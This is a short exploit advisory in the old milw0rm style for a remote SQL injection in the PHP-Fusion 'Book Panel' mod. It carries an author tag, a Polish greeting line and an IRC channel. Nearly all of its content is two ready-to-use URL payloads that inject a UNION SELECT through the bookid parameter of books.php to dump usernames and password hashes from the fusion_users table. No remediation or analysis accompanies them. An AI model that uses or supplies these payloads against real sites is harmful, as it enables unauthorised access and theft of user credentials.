/+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\ + + + |----------------------------------------------------------------| + + | PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability | + + |----------------------------------------------------------------| + + + + [-] ...Cos co robie z czystej pasji, cos co lubie i czym sie fascynuje :-) + + + + |--------------------------------| + + | Author: elusiven from Poland ! | + + | Contact: elusivenpl@gmail.com | + + | Greetings: Fusi0n Group | + + |--------------------------------| + + + + Exploit: + + + + http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users-- + + http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users-- + + + \+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/ /join #wyjadacze on irc.quakenet.org # milw0rm.com [2009-03-09]